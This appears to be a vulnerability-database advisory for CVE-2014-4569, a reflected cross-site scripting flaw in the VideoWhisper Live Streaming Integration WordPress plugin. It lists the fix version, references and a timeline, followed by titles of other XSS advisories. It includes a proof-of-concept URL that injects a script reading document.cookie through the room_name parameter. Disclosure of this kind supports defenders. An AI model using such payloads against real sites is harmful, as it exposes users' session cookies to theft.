VideoWhisper Live Streaming Integration < 4.27.4 – Cross-Site Scripting (XSS) | CVE 2014-4569 | Plugin Vulnerabilities

Description

The Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://localhost/wp-content/plugins/videowhisper-live-streaming-integration/ls/vv_login.php?room_name=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26

Affects Plugins

videowhisper-live-streaming-integration

Fixed in 4.27.4

References

CVE

URL

https://codevigilant.com/disclosure/wp-plugin-videowhisper-live-streaming-integration-a3-cross-site-scripting-xss/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

anantshri

Verified

No

WPVDB ID

3ba16f13-3993-482e-9981-b5b0bb27fc97

Timeline

Publicly Published

2014-06-12 (about 11 years ago)

Added

2014-08-01 (about 11 years ago)

Last Updated

2021-04-13 (about 5 years ago)

Other

Published

Title

Published

2024-12-05

Title

Advanced Control Manager for WordPress by ItalyStrap <= 2.16.0 - Reflected Cross-Site Scripting

Published

2025-04-01

Title

Delete Post Revision <= 1.1 - Reflected Cross-Site Scripting

Published

2024-02-28

Title

My Sticky Bar < 2.6.8 - Admin+ Stored XSS

Published

2025-12-12

Title

Shopbuilder < 3.2.2 - Reflected XSS

Published

2025-07-20

Title

Simple Stripe Checkout <= 1.1.28 - Reflected Cross-Site Scripting